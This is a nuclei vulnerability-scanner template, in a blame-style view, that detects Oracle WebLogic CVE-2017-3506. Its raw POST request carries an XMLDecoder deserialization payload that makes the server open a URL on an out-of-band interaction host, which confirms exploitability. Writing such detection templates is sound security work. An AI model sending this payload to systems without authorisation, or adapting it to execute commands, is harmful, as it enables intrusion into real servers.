nuclei-templates/cves/2017/CVE-2017-3506.yaml

47 lines
1.8 KiB
YAML
Raw Normal View History

2021-04-26 09:48:57 +00:00
id: CVE-2017-3506
info:
2021-04-26 09:50:04 +00:00
name: Oracle Weblogic Remote OS Command Execution
2021-04-26 09:48:57 +00:00
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference:
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.40
cve-id: CVE-2017-3506
2021-04-26 09:48:57 +00:00
requests:
- raw:
- |
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
2021-05-02 13:21:04 +00:00
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{{interactsh-url}}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
2021-04-26 09:48:57 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
2021-04-26 09:48:57 +00:00
words:
- "http"